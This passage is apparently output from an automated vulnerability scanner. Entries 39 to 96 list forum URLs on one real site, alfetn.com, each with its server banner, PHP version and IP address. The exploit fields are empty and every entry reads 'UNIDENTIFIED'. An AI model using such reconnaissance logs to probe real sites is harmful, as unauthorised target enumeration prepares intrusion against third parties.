  1277. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=629287 ]
  1278. |_[ + ] Exploit::
  1279. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1280. |_[ + ] More details:: / - / , ISP:
  1281. |_[ + ] Found:: UNIDENTIFIED
  1282.  
  1283. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1284. |_[ + ] [ 39 / 100 ]-[07:19:43] [ - ]
  1285. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?p=429574 ]
  1286. |_[ + ] Exploit::
  1287. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1288. |_[ + ] More details:: / - / , ISP:
  1289. |_[ + ] Found:: UNIDENTIFIED
  1290.  
  1291. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1292. |_[ + ] [ 40 / 100 ]-[07:19:48] [ - ]
  1293. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=554743 ]
  1294. |_[ + ] Exploit::
  1295. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1296. |_[ + ] More details:: / - / , ISP:
  1297. |_[ + ] Found:: UNIDENTIFIED
  1298.  
  1299. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1300. |_[ + ] [ 41 / 100 ]-[07:19:53] [ - ]
  1301. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=542780 ]
  1302. |_[ + ] Exploit::
  1303. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1304. |_[ + ] More details:: / - / , ISP:
  1305. |_[ + ] Found:: UNIDENTIFIED
  1306.  
  1307. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1308. |_[ + ] [ 42 / 100 ]-[07:19:58] [ - ]
  1309. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?p=537871 ]
  1310. |_[ + ] Exploit::
  1311. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1312. |_[ + ] More details:: / - / , ISP:
  1313. |_[ + ] Found:: UNIDENTIFIED
  1314.  
  1315. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1316. |_[ + ] [ 43 / 100 ]-[07:20:03] [ - ]
  1317. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=533527 ]
  1318. |_[ + ] Exploit::
  1319. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1320. |_[ + ] More details:: / - / , ISP:
  1321. |_[ + ] Found:: UNIDENTIFIED
  1322.  
  1323. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1324. |_[ + ] [ 44 / 100 ]-[07:20:08] [ - ]
  1325. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=498117 ]
  1326. |_[ + ] Exploit::
  1327. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1328. |_[ + ] More details:: / - / , ISP:
  1329. |_[ + ] Found:: UNIDENTIFIED
  1330.  
  1331. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1332. |_[ + ] [ 45 / 100 ]-[07:20:13] [ - ]
  1333. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=470037 ]
  1334. |_[ + ] Exploit::
  1335. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1336. |_[ + ] More details:: / - / , ISP:
  1337. |_[ + ] Found:: UNIDENTIFIED
  1338.  
  1339. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1340. |_[ + ] [ 46 / 100 ]-[07:20:18] [ - ]
  1341. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?p=458783 ]
  1342. |_[ + ] Exploit::
  1343. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1344. |_[ + ] More details:: / - / , ISP:
  1345. |_[ + ] Found:: UNIDENTIFIED
  1346.  
  1347. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1348. |_[ + ] [ 47 / 100 ]-[07:20:23] [ - ]
  1349. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=454363 ]
  1350. |_[ + ] Exploit::
  1351. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1352. |_[ + ] More details:: / - / , ISP:
  1353. |_[ + ] Found:: UNIDENTIFIED
  1354.  
  1355. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1356. |_[ + ] [ 48 / 100 ]-[07:20:28] [ - ]
  1357. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?p=369423 ]
  1358. |_[ + ] Exploit::
  1359. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1360. |_[ + ] More details:: / - / , ISP:
  1361. |_[ + ] Found:: UNIDENTIFIED
  1362.  
  1363. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1364. |_[ + ] [ 49 / 100 ]-[07:20:33] [ - ]
  1365. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=361080 ]
  1366. |_[ + ] Exploit::
  1367. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1368. |_[ + ] More details:: / - / , ISP:
  1369. |_[ + ] Found:: UNIDENTIFIED
  1370.  
  1371. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1372. |_[ + ] [ 50 / 100 ]-[07:20:38] [ - ]
  1373. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=322273 ]
  1374. |_[ + ] Exploit::
  1375. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1376. |_[ + ] More details:: / - / , ISP:
  1377. |_[ + ] Found:: UNIDENTIFIED
  1378.  
  1379. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1380. |_[ + ] [ 51 / 100 ]-[07:20:43] [ - ]
  1381. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=297561 ]
  1382. |_[ + ] Exploit::
  1383. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1384. |_[ + ] More details:: / - / , ISP:
  1385. |_[ + ] Found:: UNIDENTIFIED
  1386.  
  1387. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1388. |_[ + ] [ 52 / 100 ]-[07:20:47] [ - ]
  1389. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=180472 ]
  1390. |_[ + ] Exploit::
  1391. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1392. |_[ + ] More details:: / - / , ISP:
  1393. |_[ + ] Found:: UNIDENTIFIED
  1394.  
  1395. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1396. |_[ + ] [ 53 / 100 ]-[07:20:52] [ - ]
  1397. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?p=151671 ]
  1398. |_[ + ] Exploit::
  1399. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1400. |_[ + ] More details:: / - / , ISP:
  1401. |_[ + ] Found:: UNIDENTIFIED
  1402.  
  1403. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1404. |_[ + ] [ 54 / 100 ]-[07:20:56] [ - ]
  1405. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=7381 ]
  1406. |_[ + ] Exploit::
  1407. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1408. |_[ + ] More details:: / - / , ISP:
  1409. |_[ + ] Found:: UNIDENTIFIED
  1410.  
  1411. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1412. |_[ + ] [ 55 / 100 ]-[07:21:00] [ - ]
  1413. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=99560 ]
  1414. |_[ + ] Exploit::
  1415. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1416. |_[ + ] More details:: / - / , ISP:
  1417. |_[ + ] Found:: UNIDENTIFIED
  1418.  
  1419. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1420. |_[ + ] [ 56 / 100 ]-[07:21:05] [ - ]
  1421. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=78956 ]
  1422. |_[ + ] Exploit::
  1423. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1424. |_[ + ] More details:: / - / , ISP:
  1425. |_[ + ] Found:: UNIDENTIFIED
  1426.  
  1427. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1428. |_[ + ] [ 57 / 100 ]-[07:21:09] [ - ]
  1429. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?p=24967 ]
  1430. |_[ + ] Exploit::
  1431. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1432. |_[ + ] More details:: / - / , ISP:
  1433. |_[ + ] Found:: UNIDENTIFIED
  1434.  
  1435. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1436. |_[ + ] [ 58 / 100 ]-[07:21:13] [ - ]
  1437. |_[ + ] Target:: [ http://www.alfetn.com/vb3//login.php?do=lostpw&langid=8 ]
  1438. |_[ + ] Exploit::
  1439. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1440. |_[ + ] More details:: / - / , ISP:
  1441. |_[ + ] Found:: UNIDENTIFIED
  1442.  
  1443. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1444. |_[ + ] [ 59 / 100 ]-[07:21:17] [ - ]
  1445. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=1050712 ]
  1446. |_[ + ] Exploit::
  1447. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1448. |_[ + ] More details:: / - / , ISP:
  1449. |_[ + ] Found:: UNIDENTIFIED
  1450.  
  1451. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1452. |_[ + ] [ 60 / 100 ]-[07:21:22] [ - ]
  1453. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?t=77229 ]
  1454. |_[ + ] Exploit::
  1455. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1456. |_[ + ] More details:: / - / , ISP:
  1457. |_[ + ] Found:: UNIDENTIFIED
  1458.  
  1459. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1460. |_[ + ] [ 61 / 100 ]-[07:21:26] [ - ]
  1461. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?t=24399 ]
  1462. |_[ + ] Exploit::
  1463. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1464. |_[ + ] More details:: / - / , ISP:
  1465. |_[ + ] Found:: UNIDENTIFIED
  1466.  
  1467. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1468. |_[ + ] [ 62 / 100 ]-[07:21:30] [ - ]
  1469. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?t=76455 ]
  1470. |_[ + ] Exploit::
  1471. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1472. |_[ + ] More details:: / - / , ISP:
  1473. |_[ + ] Found:: UNIDENTIFIED
  1474.  
  1475. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1476. |_[ + ] [ 63 / 100 ]-[07:21:35] [ - ]
  1477. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?t=37317 ]
  1478. |_[ + ] Exploit::
  1479. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1480. |_[ + ] More details:: / - / , ISP:
  1481. |_[ + ] Found:: UNIDENTIFIED
  1482.  
  1483. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1484. |_[ + ] [ 64 / 100 ]-[07:21:40] [ - ]
  1485. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?t=49445 ]
  1486. |_[ + ] Exploit::
  1487. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1488. |_[ + ] More details:: / - / , ISP:
  1489. |_[ + ] Found:: UNIDENTIFIED
  1490.  
  1491. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1492. |_[ + ] [ 65 / 100 ]-[07:21:45] [ - ]
  1493. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?t=53285 ]
  1494. |_[ + ] Exploit::
  1495. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1496. |_[ + ] More details:: / - / , ISP:
  1497. |_[ + ] Found:: UNIDENTIFIED
  1498.  
  1499. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1500. |_[ + ] [ 66 / 100 ]-[07:21:49] [ - ]
  1501. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?t=75462 ]
  1502. |_[ + ] Exploit::
  1503. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1504. |_[ + ] More details:: / - / , ISP:
  1505. |_[ + ] Found:: UNIDENTIFIED
  1506.  
  1507. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1508. |_[ + ] [ 67 / 100 ]-[07:21:54] [ - ]
  1509. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?t=70483 ]
  1510. |_[ + ] Exploit::
  1511. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1512. |_[ + ] More details:: / - / , ISP:
  1513. |_[ + ] Found:: UNIDENTIFIED
  1514.  
  1515. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1516. |_[ + ] [ 68 / 100 ]-[07:21:59] [ - ]
  1517. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?t=71601 ]
  1518. |_[ + ] Exploit::
  1519. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1520. |_[ + ] More details:: / - / , ISP:
  1521. |_[ + ] Found:: UNIDENTIFIED
  1522.  
  1523. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1524. |_[ + ] [ 69 / 100 ]-[07:22:03] [ - ]
  1525. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?t=9355 ]
  1526. |_[ + ] Exploit::
  1527. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1528. |_[ + ] More details:: / - / , ISP:
  1529. |_[ + ] Found:: UNIDENTIFIED
  1530.  
  1531. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1532. |_[ + ] [ 70 / 100 ]-[07:22:08] [ - ]
  1533. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?t=53323 ]
  1534. |_[ + ] Exploit::
  1535. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1536. |_[ + ] More details:: / - / , ISP:
  1537. |_[ + ] Found:: UNIDENTIFIED
  1538.  
  1539. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1540. |_[ + ] [ 71 / 100 ]-[07:22:12] [ - ]
  1541. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?t=53578 ]
  1542. |_[ + ] Exploit::
  1543. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1544. |_[ + ] More details:: / - / , ISP:
  1545. |_[ + ] Found:: UNIDENTIFIED
  1546.  
  1547. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1548. |_[ + ] [ 72 / 100 ]-[07:22:17] [ - ]
  1549. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?t=39963 ]
  1550. |_[ + ] Exploit::
  1551. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1552. |_[ + ] More details:: / - / , ISP:
  1553. |_[ + ] Found:: UNIDENTIFIED
  1554.  
  1555. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1556. |_[ + ] [ 73 / 100 ]-[07:22:21] [ - ]
  1557. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?t=84707 ]
  1558. |_[ + ] Exploit::
  1559. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1560. |_[ + ] More details:: / - / , ISP:
  1561. |_[ + ] Found:: UNIDENTIFIED
  1562.  
  1563. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1564. |_[ + ] [ 74 / 100 ]-[07:22:26] [ - ]
  1565. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?t=14664 ]
  1566. |_[ + ] Exploit::
  1567. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1568. |_[ + ] More details:: / - / , ISP:
  1569. |_[ + ] Found:: UNIDENTIFIED
  1570.  
  1571. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1572. |_[ + ] [ 75 / 100 ]-[07:22:30] [ - ]
  1573. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?t=77087 ]
  1574. |_[ + ] Exploit::
  1575. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1576. |_[ + ] More details:: / - / , ISP:
  1577. |_[ + ] Found:: UNIDENTIFIED
  1578.  
  1579. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1580. |_[ + ] [ 76 / 100 ]-[07:22:34] [ - ]
  1581. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?t=43485 ]
  1582. |_[ + ] Exploit::
  1583. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1584. |_[ + ] More details:: / - / , ISP:
  1585. |_[ + ] Found:: UNIDENTIFIED
  1586.  
  1587. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1588. |_[ + ] [ 77 / 100 ]-[07:22:39] [ - ]
  1589. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?t=65395 ]
  1590. |_[ + ] Exploit::
  1591. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1592. |_[ + ] More details:: / - / , ISP:
  1593. |_[ + ] Found:: UNIDENTIFIED
  1594.  
  1595. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1596. |_[ + ] [ 78 / 100 ]-[07:22:44] [ - ]
  1597. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?t=24320 ]
  1598. |_[ + ] Exploit::
  1599. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1600. |_[ + ] More details:: / - / , ISP:
  1601. |_[ + ] Found:: UNIDENTIFIED
  1602.  
  1603. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1604. |_[ + ] [ 79 / 100 ]-[07:22:49] [ - ]
  1605. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?t=48870 ]
  1606. |_[ + ] Exploit::
  1607. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1608. |_[ + ] More details:: / - / , ISP:
  1609. |_[ + ] Found:: UNIDENTIFIED
  1610.  
  1611. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1612. |_[ + ] [ 80 / 100 ]-[07:22:54] [ - ]
  1613. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?t=9812 ]
  1614. |_[ + ] Exploit::
  1615. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1616. |_[ + ] More details:: / - / , ISP:
  1617. |_[ + ] Found:: UNIDENTIFIED
  1618.  
  1619. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1620. |_[ + ] [ 81 / 100 ]-[07:22:59] [ - ]
  1621. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?t=13784 ]
  1622. |_[ + ] Exploit::
  1623. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1624. |_[ + ] More details:: / - / , ISP:
  1625. |_[ + ] Found:: UNIDENTIFIED
  1626.  
  1627. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1628. |_[ + ] [ 82 / 100 ]-[07:23:03] [ - ]
  1629. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?t=88411 ]
  1630. |_[ + ] Exploit::
  1631. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1632. |_[ + ] More details:: / - / , ISP:
  1633. |_[ + ] Found:: UNIDENTIFIED
  1634.  
  1635. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1636. |_[ + ] [ 83 / 100 ]-[07:23:08] [ - ]
  1637. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?t=52470 ]
  1638. |_[ + ] Exploit::
  1639. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1640. |_[ + ] More details:: / - / , ISP:
  1641. |_[ + ] Found:: UNIDENTIFIED
  1642.  
  1643. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1644. |_[ + ] [ 84 / 100 ]-[07:23:12] [ - ]
  1645. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?t=82195 ]
  1646. |_[ + ] Exploit::
  1647. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1648. |_[ + ] More details:: / - / , ISP:
  1649. |_[ + ] Found:: UNIDENTIFIED
  1650.  
  1651. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1652. |_[ + ] [ 85 / 100 ]-[07:23:17] [ - ]
  1653. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?t=15004 ]
  1654. |_[ + ] Exploit::
  1655. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1656. |_[ + ] More details:: / - / , ISP:
  1657. |_[ + ] Found:: UNIDENTIFIED
  1658.  
  1659. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1660. |_[ + ] [ 86 / 100 ]-[07:23:22] [ - ]
  1661. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?t=61632 ]
  1662. |_[ + ] Exploit::
  1663. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1664. |_[ + ] More details:: / - / , ISP:
  1665. |_[ + ] Found:: UNIDENTIFIED
  1666.  
  1667. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1668. |_[ + ] [ 87 / 100 ]-[07:23:27] [ - ]
  1669. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?t=33001 ]
  1670. |_[ + ] Exploit::
  1671. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1672. |_[ + ] More details:: / - / , ISP:
  1673. |_[ + ] Found:: UNIDENTIFIED
  1674.  
  1675. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1676. |_[ + ] [ 88 / 100 ]-[07:23:31] [ - ]
  1677. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?t=48850 ]
  1678. |_[ + ] Exploit::
  1679. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1680. |_[ + ] More details:: / - / , ISP:
  1681. |_[ + ] Found:: UNIDENTIFIED
  1682.  
  1683. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1684. |_[ + ] [ 89 / 100 ]-[07:23:36] [ - ]
  1685. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?t=82618 ]
  1686. |_[ + ] Exploit::
  1687. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1688. |_[ + ] More details:: / - / , ISP:
  1689. |_[ + ] Found:: UNIDENTIFIED
  1690.  
  1691. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1692. |_[ + ] [ 90 / 100 ]-[07:23:41] [ - ]
  1693. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?t=24239 ]
  1694. |_[ + ] Exploit::
  1695. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1696. |_[ + ] More details:: / - / , ISP:
  1697. |_[ + ] Found:: UNIDENTIFIED
  1698.  
  1699. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1700. |_[ + ] [ 91 / 100 ]-[07:23:46] [ - ]
  1701. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?t=19047 ]
  1702. |_[ + ] Exploit::
  1703. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1704. |_[ + ] More details:: / - / , ISP:
  1705. |_[ + ] Found:: UNIDENTIFIED
  1706.  
  1707. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1708. |_[ + ] [ 92 / 100 ]-[07:23:50] [ - ]
  1709. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?t=35986 ]
  1710. |_[ + ] Exploit::
  1711. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1712. |_[ + ] More details:: / - / , ISP:
  1713. |_[ + ] Found:: UNIDENTIFIED
  1714.  
  1715. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1716. |_[ + ] [ 93 / 100 ]-[07:23:55] [ - ]
  1717. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?t=83503 ]
  1718. |_[ + ] Exploit::
  1719. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1720. |_[ + ] More details:: / - / , ISP:
  1721. |_[ + ] Found:: UNIDENTIFIED
  1722.  
  1723. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1724. |_[ + ] [ 94 / 100 ]-[07:23:59] [ - ]
  1725. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?t=22861 ]
  1726. |_[ + ] Exploit::
  1727. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1728. |_[ + ] More details:: / - / , ISP:
  1729. |_[ + ] Found:: UNIDENTIFIED
  1730.  
  1731. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1732. |_[ + ] [ 95 / 100 ]-[07:24:04] [ - ]
  1733. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?t=90177 ]
  1734. |_[ + ] Exploit::
  1735. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1736. |_[ + ] More details:: / - / , ISP:
  1737. |_[ + ] Found:: UNIDENTIFIED
  1738.  
  1739. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1740. |_[ + ] [ 96 / 100 ]-[07:24:09] [ - ]
  1741. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?t=93022 ]
  1742. |_[ + ] Exploit::
  1743. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1744. |_[ + ] More details:: / - / , ISP:
  1745. |_[ + ] Found:: UNIDENTIFIED
  1746.  
